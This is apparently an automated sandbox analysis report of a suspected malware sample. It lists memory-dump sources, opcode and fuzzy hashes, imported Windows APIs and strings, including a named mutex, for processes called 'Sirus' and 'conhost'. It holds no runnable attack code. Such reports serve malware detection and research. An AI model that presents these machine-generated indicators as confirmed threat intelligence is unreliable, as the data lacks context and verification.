                                                    • Instruction ID: 0360b8138e8633723a66c729c6cbc203f63ac6a2bb53b2f3afad9304f8fda38a
                                                    • Opcode Fuzzy Hash: c6d343facf2d9d343ee56971c3cf5cbbdf7abb0d4cbe0a6a3ede03d1e891f91e
                                                    • Instruction Fuzzy Hash: 6AE0C27BA481200AEB20D514FC837C93342FBD8305F2D88ADD0C0E7285C129E5468361
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2019aefbe48f7dda25edc2eebbf34d1f8b95950ddfe51eb09e227a25628c8b1e
                                                    • Instruction ID: b362f7ef594de4bb2d60c4cf347d46d0dc4c6cb1c0111bf0ed97358942715a4e
                                                    • Opcode Fuzzy Hash: 2019aefbe48f7dda25edc2eebbf34d1f8b95950ddfe51eb09e227a25628c8b1e
                                                    • Instruction Fuzzy Hash: 18D02EE7B083680B8F0A2280A929AA83B2C891380038400C3C6068B362E9019E5D83E2
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a4ebf5152af2da8413c7217308b0fcd52b6d409524408a791056a7b0af7b4169
                                                    • Instruction ID: 738a7fb04da227fe78a7fd50d0c470903461dd4f92eda5f8cb146c96181692d7
                                                    • Opcode Fuzzy Hash: a4ebf5152af2da8413c7217308b0fcd52b6d409524408a791056a7b0af7b4169
                                                    • Instruction Fuzzy Hash: CFE04FB490060CEFCB40EFB4D90245C7BB5EB842057108654EC04A3244DA322E009B56
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 402bb61d99a11ac031d905b626a6a0aebd143c882d964bf38b2fe4e25813886c
                                                    • Instruction ID: 4a7108fcb956fa5bce26b06abb402ce0e47e6680cfcf50822b19a6b046ea0180
                                                    • Opcode Fuzzy Hash: 402bb61d99a11ac031d905b626a6a0aebd143c882d964bf38b2fe4e25813886c
                                                    • Instruction Fuzzy Hash: D5D05E353042244BDB18AB29E845AA97399EB463A8708416DE906E7354DF64F84187D8
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e91d3fe77dbf73efa4a345fb6576f9d2af0d6db482032976c81470a341721272
                                                    • Instruction ID: eff77aaf3651bf9ab52dce3b3df90d01c277d3733bf3d236d58e143568e60cff
                                                    • Opcode Fuzzy Hash: e91d3fe77dbf73efa4a345fb6576f9d2af0d6db482032976c81470a341721272
                                                    • Instruction Fuzzy Hash: 61C0122270552816C746F365741035AB74D9F4A692F05005EE60CE7202CE89588447C9
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f83b139dbd152118f609790107c3c20a24ee42b7c95e7fda54567b9927e121e8
                                                    • Instruction ID: 65d6c200fd78a340a9bce8b2336b5da96db745c5b814c487d7cb3aecaf9eb4ba
                                                    • Opcode Fuzzy Hash: f83b139dbd152118f609790107c3c20a24ee42b7c95e7fda54567b9927e121e8
                                                    • Instruction Fuzzy Hash: 92E01774A4020ADFC700CFA4D099AADBFB1FF0C304F208099E116EB260CB30A808CF50
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 32eab2aade5e44f91f7b12a1f12be99e4fbdb569ff2941906b3ac264b0449212
                                                    • Instruction ID: dd11b7872cc1d336e97756c4ad5276883c7ef61e19ea3ee9dae0c550718c5e58
                                                    • Opcode Fuzzy Hash: 32eab2aade5e44f91f7b12a1f12be99e4fbdb569ff2941906b3ac264b0449212
                                                    • Instruction Fuzzy Hash: 78E0176141D7C49EDB139B28A819294BFB4AF03215F0A80DBD8809F067CB744509C722
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5fc3d0973eb95c59b1b08f0b7867cb7cabf8fd91868f9148e6403214e922f738
                                                    • Instruction ID: ba16b4711a9c5478d898755db84862b151b0230261d047ba2643ed51e49f239b
                                                    • Opcode Fuzzy Hash: 5fc3d0973eb95c59b1b08f0b7867cb7cabf8fd91868f9148e6403214e922f738
                                                    • Instruction Fuzzy Hash: 4FD0A7300143518FEF01EF28E8D86483B21DF02339B108493D8444904FE734A217CF41
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 04d31d808d2a84a8dc17f90925d0eee5a9eda1e2395cab430a02fe14404b7316
                                                    • Instruction ID: 64f0c48f8c02cd4047fb0a089590b3e6f31e459d3e9c95b073fff41919b1d768
                                                    • Opcode Fuzzy Hash: 04d31d808d2a84a8dc17f90925d0eee5a9eda1e2395cab430a02fe14404b7316
                                                    • Instruction Fuzzy Hash: CEC080E7D14A0446D340397494873AC7720FB35211F521721C5D5151E2FD1461B74741
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a2a4801bbedc2d6f2156457974e218e084c2fdeb6cb06ffd94f1b4e93970250e
                                                    • Instruction ID: a5ff2a2d21cdde4ecca437dcd6fac464baaf1c1e8356e84cc73697d5c84e08b1
                                                    • Opcode Fuzzy Hash: a2a4801bbedc2d6f2156457974e218e084c2fdeb6cb06ffd94f1b4e93970250e
                                                    • Instruction Fuzzy Hash: 05B0123234863C130E0E319DB4148AD768E4E8697028000BBE60E97342CD877D9903DF
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a63def5139de9d73faf5875852bb5fba8a212dd085cb6ef3f47b932ebbaf416d
                                                    • Instruction ID: 7e4406d5a8e2c0384778edccfcf94a76deab9ffbd48e6b5977590d7107842c69
                                                    • Opcode Fuzzy Hash: a63def5139de9d73faf5875852bb5fba8a212dd085cb6ef3f47b932ebbaf416d
                                                    • Instruction Fuzzy Hash: CFB01272746538130E0E339E74154AEB28D4DC587024400ABE70D97341CD852D4143DE
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a67735947409698bf476cb2ca68cd44975cbc3241d5938395f3166e654cbcaef
                                                    • Instruction ID: ce76eb5978a3bd655ba984aab26f5dfbd477b7ac2ba62d1aece33dd54f077107
                                                    • Opcode Fuzzy Hash: a67735947409698bf476cb2ca68cd44975cbc3241d5938395f3166e654cbcaef
                                                    • Instruction Fuzzy Hash: CAC08C7A300208BFDF80AFD8C841D56776DAB08710F50D400FA088E211C272ECA2DBA0
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8ed4d9370922f15b5a471fd3c35e40c4563098d75d7861201b29acb4585601bf
                                                    • Instruction ID: 0336fdefab63a5a705a21b74368da152052d278d15dd736134ea2cdadd339a94
                                                    • Opcode Fuzzy Hash: 8ed4d9370922f15b5a471fd3c35e40c4563098d75d7861201b29acb4585601bf
                                                    • Instruction Fuzzy Hash: A3C0127A200208AFDB80AF94D881D957B29AB08610F109400FA088E211C272D9A39B90
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                    • Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
                                                    • Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                    • Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6845c30fb37f62e7e0e63bce95d0fa761f98f7930f0edd663cadc0411524bed4
                                                    • Instruction ID: 96d302972e33265203362b86a57a9dd482e0a7c4286ab658478821761901ec3a
                                                    • Opcode Fuzzy Hash: 6845c30fb37f62e7e0e63bce95d0fa761f98f7930f0edd663cadc0411524bed4
                                                    • Instruction Fuzzy Hash: 78C00235140108AFC740DF54D485D95BB65EB59660B1180A1F9584B722C632D9129B80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 9a13641de98cff9baa90dde59bc3298d6a7da3d03036ec613925e4bc2820dab7
                                                    • Instruction ID: 0e996c5359a68faf3b9fd72eb5846d26d367d990acdeb4f0448ccf14f5f82f25
                                                    • Opcode Fuzzy Hash: 9a13641de98cff9baa90dde59bc3298d6a7da3d03036ec613925e4bc2820dab7
                                                    • Instruction Fuzzy Hash: 7C41FEB4D006488FDB14CFA9D895AEEFBF1BF09304F209129E429BB250DB349845CF49
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: f987b3267648e9781c648cddb561d18f89fd5e30bb2db27b65d8cd0f68f3c930
                                                    • Instruction ID: 1593ec3d34ca296d810e26785652dc6faef7060407242925b98a55ab6b4a2b5e

                                                    Execution Graph

                                                    Execution Coverage: 2.4%
                                                    Dynamic/Decrypted Code Coverage: 0%
                                                    Signature Coverage: 2.5%
                                                    Total number of Nodes: 829
                                                    Total number of Limit Nodes: 2

                                                    Callgraph


                                                    Control-flow Graph of function 140001394
                                                    APIs
                                                    • NtClose.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                    Memory Dump Source
                                                    • Source File: 00000043.00000002.4114158378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000043.00000002.4114118323.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114200369.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114240970.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114323206.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 1e727cabbff0cae9e27b261b2207436e6fa371e00c3f64abe26120617a749e69
                                                    • Instruction ID: 0a01b27cd887de470f3a79e9e26df08ee21fc81555de9c41fe10c45f52e6a1ec
                                                    • Opcode Fuzzy Hash: 1e727cabbff0cae9e27b261b2207436e6fa371e00c3f64abe26120617a749e69
                                                    • Instruction Fuzzy Hash: CAF0AFB2608B408AEA12DF52F89579A77A0F38D7C0F00991ABBC843735DB3CC190CB40

                                                    Control-flow Graph of function 1400026e0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000043.00000002.4114158378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000043.00000002.4114118323.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114200369.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114240970.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114323206.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: wcslen$wcscatwcscpywcsncmp
                                                    • String ID: 0$X$\BaseNamedObjects\plfgpcdlixqaywhhdqwutvgp$`
                                                    • API String ID: 597572034-1325053630
                                                    • Opcode ID: 6dbc3eec9034183ef303d02f415f3af6604283597bc37c30aa4f9b18b6c7e930
                                                    • Instruction ID: 8bace8d1d13e29771e4c874122eba6c2f333ff3c4830102eec7aa4bd748b2165
                                                    • Opcode Fuzzy Hash: 6dbc3eec9034183ef303d02f415f3af6604283597bc37c30aa4f9b18b6c7e930
                                                    • Instruction Fuzzy Hash: 4C1258B2608BC085E762CB16F8443EAB7A4F789794F414215EBA857BF5EF78C189C700

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000043.00000002.4114158378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000043.00000002.4114118323.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114200369.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114240970.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114323206.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                    • String ID:
                                                    • API String ID: 2643109117-0
                                                    • Opcode ID: c4d67565a20342ade335354fc59ecc84fd5eb261badca5579fbb5ee24efd579b
                                                    • Instruction ID: 070ab519a2817fabac9d3928640a8dfc31f1868cd1d81c957eb574597805d415
                                                    • Opcode Fuzzy Hash: c4d67565a20342ade335354fc59ecc84fd5eb261badca5579fbb5ee24efd579b
                                                    • Instruction Fuzzy Hash: E05113B1A11A4085FB16EF27F9947EA27A5BB8D7D0F849121FB4D873B6DE38C4958300

                                                    Control-flow Graph of function 140001ba0
                                                    APIs
                                                    • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                    • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                    • memcpy.MSVCRT ref: 0000000140001CE0
                                                    • GetLastError.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000043.00000002.4114158378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000043.00000002.4114118323.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114200369.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114240970.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114323206.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                    • API String ID: 2595394609-2123141913
                                                    • Opcode ID: 79a2a9d4ac031f2ce5fafed73baa3885646a95f71b85d3d4911c59ac99310c7d
                                                    • Instruction ID: 568161692b5c4f8a705951d6b28697fc04e6310cca5c6e1950853b3621b7b2e0
                                                    • Opcode Fuzzy Hash: 79a2a9d4ac031f2ce5fafed73baa3885646a95f71b85d3d4911c59ac99310c7d
                                                    • Instruction Fuzzy Hash: 334143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700

                                                    Control-flow Graph of function 140002104
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000043.00000002.4114158378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000043.00000002.4114118323.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114200369.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114240970.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114323206.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                    • String ID:
                                                    • API String ID: 926137887-0
                                                    • Opcode ID: 90a19a65f5c6fc128aa79077d7c42a4fb441e5ead76d492d121654b50c4905b0
                                                    • Instruction ID: f187cb6aa2ea60f0469956b9f5200469d8ecfadf0b7e99ee31c93393cd0a6912
                                                    • Opcode Fuzzy Hash: 90a19a65f5c6fc128aa79077d7c42a4fb441e5ead76d492d121654b50c4905b0
                                                    • Instruction Fuzzy Hash: 1521E0B1715A1292FA5BEB53F9483E923A0B76CBD0F444021FB1E576B4DB7A8986C300

                                                    Control-flow Graph of function 140001880
                                                    APIs
                                                    • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000043.00000002.4114158378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000043.00000002.4114118323.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114200369.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114240970.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114323206.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                    • API String ID: 544645111-395989641
                                                    • Opcode ID: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                    • Instruction ID: bed1886f8e7b3562c786f91e2c2504e2a336d35a61311b426e06807153cec951
                                                    • Opcode Fuzzy Hash: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                    • Instruction Fuzzy Hash: 415114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700

                                                    Control-flow Graph of function 140001800
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000043.00000002.4114158378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000043.00000002.4114118323.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114200369.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114240970.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114323206.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: fprintf
                                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                    • API String ID: 383729395-3474627141
                                                    • Opcode ID: 6b47e17b8a12b31c17ff5f2ad6e06330f120307e4e61a4ac2284c96fa72ab60d
                                                    • Instruction ID: 91e3a911f83b651f4698e80430053fdc384feaeeeedb9bbeb5e2969e9f62671f
                                                    • Opcode Fuzzy Hash: 6b47e17b8a12b31c17ff5f2ad6e06330f120307e4e61a4ac2284c96fa72ab60d
                                                    • Instruction Fuzzy Hash: BDF0C271A04A4482E212EB2AB9413EAA360E74D3C1F409211FF4D532A1DF3CD1828300

                                                    Control-flow Graph of function 14000219e
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000043.00000002.4114158378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000043.00000002.4114118323.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114200369.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114240970.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                    • Associated: 00000043.00000002.4114323206.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                    • String ID:
                                                    • API String ID: 682475483-0
                                                    • Opcode ID: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                    • Instruction ID: 8e08899b71d5d6c295770fc95a4fa8b22c720a8a39741bac27afb53efd3d8dea
                                                    • Opcode Fuzzy Hash: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                    • Instruction Fuzzy Hash: C201B2B5705A0192FA5BDB53FE083E86360B76CBD1F454061EF0957AB4DF79C996C200